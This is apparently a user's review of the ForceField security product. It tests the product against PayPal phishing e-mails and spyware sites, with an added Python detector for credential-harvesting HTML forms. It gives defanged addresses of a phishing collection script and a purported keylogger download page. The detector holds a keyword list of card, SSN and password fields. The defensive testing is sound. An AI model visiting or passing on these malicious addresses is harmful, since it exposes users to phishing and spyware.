ForceField put to a couple of tests
To get a feel for how the product handles, I ran the following tests:
- Phishing test
- Spyware/Keylogger test
Within the last couple of months I've received two bogus PayPal e-mails. In one e-mail PayPal is informing me of an issue with my account. This is typical of phishing scams designed to have you divulge your PayPal account information. The e-mail has a link that looks like it will take you to a PayPal page but instead takes you to http://173-29-115-105(dot)client(dot)mchsi(dot)com:84/ which, of course, no longer exists; it probably got shut down as soon as it was discovered. When I clicked this link, I didn't get anything back from ForceField; I'm not sure why, but I'm assuming it is because it needed to see the page from that site, and when it couldn't, it had nothing to report. However, the browser itself reported that the URL for the link had a suspicious format.
The other bogus notification from PayPal says that they needed me to update my PayPal information. This one is a little more interesting as it has an HTML attachment (restore.html), which if downloaded and opened would show a form. The attachment has no virus, but it has a form which if completed and submitted would run a script at http://122(dot)102(dot)5(dot)38/qweasdzxc/libraries/transformations/done4.php. The form asks for everything under the sun: your name, address, credit card, credit card expiration, credit card security code, social security number, and so on--basically everything known to man to help steal your money and identity. When I downloaded the attachment, Yahoo e-mail didn't detect any virus, and ForceField allowed the file to be downloaded. I opened the file and filled it in with bogus information which I then submitted. ForceField had no reaction to it at all. Again, I'm guessing the site where the script is hosted has probably been shut down. I'm giving ForceField the benefit of the doubt that it is designed not to do anything for a link that leads nowhere.
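An added example, not part of the original post or of ForceField: a static triage check for HTML attachments like the restore.html described above, which carry no malware and so pass a virus scan, but whose form posts sensitive fields to a raw IP address. The keyword list, the two-keyword threshold, the function names and the sample form (which uses a documentation-range address) are assumptions constructed for illustration.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlsplit
# Hypothetical keyword list: substrings of field names a provider would not request via an e-mailed form.
SENSITIVE = ("card", "cvv", "cvc", "ssn", "social", "expir", "password")
# Constructed sample attachment; 192.0.2.10 is a documentation-only address.
SAMPLE = """<form method="post" action="http://192.0.2.10/collect.php">
<input name="full_name"><input name="card_number"><input name="card_expiry">
<input name="cvv"><input name="ssn"><input type="submit"></form>"""

class FormAudit(HTMLParser):
    """Collect each <form>'s action URL and the names of its input fields."""
    def __init__(self):
        super().__init__()
        self.forms = []
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append({"action": a.get("action") or "", "fields": []})
        elif tag in ("input", "select", "textarea") and self.forms:
            self.forms[-1]["fields"].append((a.get("name") or "").lower())

def host_is_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def audit_attachment(html, claimed_domain):
    """Return [(action_url, [reasons])] for forms that look like credential harvesters."""
    parser = FormAudit()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        parts = urlsplit(form["action"])
        host = parts.hostname or ""
        reasons = []
        if host_is_ip(host):
            reasons.append("action host is a raw IP address")
        elif host and host != claimed_domain and not host.endswith("." + claimed_domain):
            reasons.append("action host is not the claimed sender's domain")
        if parts.scheme == "http":
            reasons.append("submits over plain HTTP")
        asked = sorted({k for k in SENSITIVE for f in form["fields"] if k in f})
        if len(asked) >= 2:  # assumed threshold: one sensitive field alone is common on real login forms
            reasons.append("asks for: " + ", ".join(asked))
        if reasons:
            findings.append((form["action"], reasons))
    return findings
```

Because the check reads only the attachment, it still gives a result after the collection script has been taken offline, the situation in which neither test above produced a warning.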
I really needed to find a real and active phishing site. So I did searches on the web and found one. I attempted to browse it and I got ForceField to respond, as shown in the image below.
As you can see, it is very obvious with all the red color that you've hit a bad site. You have the option to stay at the site, but the default selected option is "Go Back". I clicked "Go Back" and it gave me this:
This gave me a sense that danger has been averted.
To do this test, I searched for a list of known spyware sites. One such site listing these "bad" sites is the Rogue/Suspect Anti-Spyware Sites list. The sites listed purport to provide information and tools to help prevent spyware, but instead infect your computer with spyware. I also found a site that is purported to be a known spyware site--http://www(dot)brothersoft(dot)com/keylogger-download-34907.html. I also got a reaction from ForceField on this. See below.
With an "in your face" red alert dialog box, most users will click the "Go Back" button.